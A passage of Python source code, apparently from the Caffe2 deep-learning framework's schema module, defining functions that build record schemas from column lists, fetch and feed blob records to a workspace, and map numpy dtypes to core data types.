for child in self.children:
child_names.append(child.name)
if (set(child_names) == set(list_names)):
for child in self.children:
if child.name == 'values':
values_field = child.get_field()
else:
lengths_field = child.get_field()
self.field = List(
values_field,
lengths_blob=lengths_field
)
self.type_str = "List"
return self.field
elif (set(child_names) == set(map_names)):
for child in self.children:
if child.name == 'keys':
key_field = child.get_field()
elif child.name == 'values':
values_field = child.get_field()
else:
lengths_field = child.get_field()
self.field = Map(
key_field,
values_field,
lengths_blob=lengths_field
)
self.type_str = "Map"
return self.field
else:
struct_fields = []
for child in self.children:
struct_fields.append((child.name, child.get_field()))
self.field = Struct(*struct_fields)
self.type_str = "Struct"
return self.field
def print_recursively(self):
for child in self.children:
child.print_recursively()
logger.info("Printing node: Name and type")
logger.info(self.name)
logger.info(self.type_str)
def from_column_list(
col_names, col_types=None,
col_blobs=None, col_metadata=None
):
"""
Given a list of names, types, and optionally values, construct a Schema.
"""
if col_types is None:
col_types = [None] * len(col_names)
if col_metadata is None:
col_metadata = [None] * len(col_names)
if col_blobs is None:
col_blobs = [None] * len(col_names)
assert len(col_names) == len(col_types), (
'col_names and col_types must have the same length.'
)
assert len(col_names) == len(col_metadata), (
'col_names and col_metadata must have the same length.'
)
assert len(col_names) == len(col_blobs), (
'col_names and col_blobs must have the same length.'
)
root = _SchemaNode('root', 'Struct')
for col_name, col_type, col_blob, col_metadata in zip(
col_names, col_types, col_blobs, col_metadata
):
columns = col_name.split(FIELD_SEPARATOR)
current = root
for i in range(len(columns)):
name = columns[i]
type_str = ''
field = None
if i == len(columns) - 1:
type_str = col_type
field = Scalar(
dtype=col_type,
blob=col_blob,
metadata=col_metadata
)
next = current.add_child(name, type_str)
if field is not None:
next.field = field
current = next
return root.get_field()
def from_blob_list(schema, values, throw_on_type_mismatch=False):
"""
Create a schema that clones the given schema, but containing the given
list of values.
"""
assert isinstance(schema, Field), 'Argument `schema` must be a Field.'
if isinstance(values, BlobReference):
values = [values]
record = schema.clone_schema()
scalars = record.all_scalars()
assert len(scalars) == len(values), (
'Values must have %d elements, got %d.' % (len(scalars), len(values))
)
for scalar, value in zip(scalars, values):
scalar.set_value(value, throw_on_type_mismatch, unsafe=True)
return record
def as_record(value):
if isinstance(value, Field):
return value
elif isinstance(value, list) or isinstance(value, tuple):
is_field_list = all(
f is tuple and len(f) == 2 and isinstance(f[0], basestring)
for f in value
)
if is_field_list:
return Struct(* [(k, as_record(v)) for k, v in value])
else:
return Tuple(* [as_record(f) for f in value])
elif isinstance(value, dict):
return Struct(* [(k, as_record(v)) for k, v in viewitems(value)])
else:
return _normalize_field(value)
def FetchRecord(blob_record, ws=None, throw_on_type_mismatch=False):
"""
Given a record containing BlobReferences, return a new record with same
schema, containing numpy arrays, fetched from the current active workspace.
"""
def fetch(v):
if ws is None:
return workspace.FetchBlob(str(v))
else:
return ws.blobs[str(v)].fetch()
assert isinstance(blob_record, Field)
field_blobs = blob_record.field_blobs()
assert all(isinstance(v, BlobReference) for v in field_blobs)
field_arrays = [fetch(value) for value in field_blobs]
return from_blob_list(blob_record, field_arrays, throw_on_type_mismatch)
def FeedRecord(blob_record, arrays, ws=None):
"""
Given a Record containing blob_references and arrays, which is either
a list of numpy arrays or a Record containing numpy arrays, feeds the
record to the current workspace.
"""
def feed(b, v):
if ws is None:
workspace.FeedBlob(str(b), v)
else:
ws.create_blob(str(b))
ws.blobs[str(b)].feed(v)
assert isinstance(blob_record, Field)
field_blobs = blob_record.field_blobs()
assert all(isinstance(v, BlobReference) for v in field_blobs)
if isinstance(arrays, Field):
# TODO: check schema
arrays = arrays.field_blobs()
assert len(arrays) == len(field_blobs), (
'Values must contain exactly %d ndarrays.' % len(field_blobs)
)
for blob, array in zip(field_blobs, arrays):
feed(blob, array)
def NewRecord(net, schema):
"""
Given a record of np.arrays, create a BlobReference for each one of them,
returning a record containing BlobReferences. The name of each returned blob
is NextScopedBlob(field_name), which guarantees unique name in the current
net. Use NameScope explicitly to avoid name conflictions between different
nets.
"""
if isinstance(schema, Scalar):
result = schema.clone()
result.set_value(
blob=net.NextScopedBlob('unnamed_scalar'),
unsafe=True,
)
return result
assert isinstance(schema, Field), 'Record must be a schema.Field instance.'
blob_refs = [
net.NextScopedBlob(prefix=name)
for name in schema.field_names()
]
return from_blob_list(schema, blob_refs)
def ConstRecord(net, array_record):
"""
Given a record of arrays, returns a record of blobs,
initialized with net.Const.
"""
blob_record = NewRecord(net, array_record)
for blob, array in zip(
blob_record.field_blobs(), array_record.field_blobs()
):
net.Const(array, blob)
return blob_record
def InitEmptyRecord(net, schema_or_record, enforce_types=False):
if not schema_or_record.has_blobs():
record = NewRecord(net, schema_or_record)
else:
record = schema_or_record
for blob_type, blob in zip(record.field_types(), record.field_blobs()):
try:
data_type = data_type_for_dtype(blob_type)
shape = [0] + list(blob_type.shape)
net.ConstantFill([], blob, shape=shape, dtype=data_type)
except TypeError:
# If data_type_for_dtype doesn't know how to resolve given numpy
# type to core.DataType, that function can throw type error (for
# example that would happen for cases of unknown types such as
# np.void). This is not a problem for cases when the record if going
# to be overwritten by some operator later, though it might be an
# issue for type/shape inference.
if enforce_types:
raise
# If we don't enforce types for all items we'll create a blob with
# the default ConstantFill (FLOAT, no shape)
net.ConstantFill([], blob, shape=[0])
return record
_DATA_TYPE_FOR_DTYPE = [
(np.str, core.DataType.STRING),
(np.float32, core.DataType.FLOAT),
(np.float64, core.DataType.DOUBLE),
(np.bool, core.DataType.BOOL),
(np.int8, core.DataType.INT8),
(np.int16, core.DataType.INT16),
(np.int32, core.DataType.INT32),
(np.int64, core.DataType.INT64),
(np.uint8, core.DataType.UINT8),
(np.uint16, core.DataType.UINT16),
]
def is_schema_subset(schema, original_schema):
# TODO add more checks
return set(schema.field_names()).issubset(
set(original_schema.field_names()))
def equal_schemas(schema,
original_schema,
check_field_names=True,
check_field_types=True,
check_field_metas=False):
assert isinstance(schema, Field)
assert isinstance(original_schema, Field)
if check_field_names and (
schema.field_names() != original_schema.field_names()):
return False
if check_field_types and (
schema.field_types() != original_schema.field_types()):
return False
if check_field_metas and (
schema.field_metadata() != original_schema.field_metadata()):
return False
return True
def schema_check(schema, previous=None):
record = as_record(schema)
if previous is not None:
assert equal_schemas(schema, previous)
return record
def data_type_for_dtype(dtype):
for np_type, dt in _DATA_TYPE_FOR_DTYPE:
if dtype.base == np_type:
return dt
raise TypeError('Unknown dtype: ' + str(dtype.base))
def attach_metadata_to_scalars(field, metadata):
for f in field.all_scalars():
f.set_metadata(metadata)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.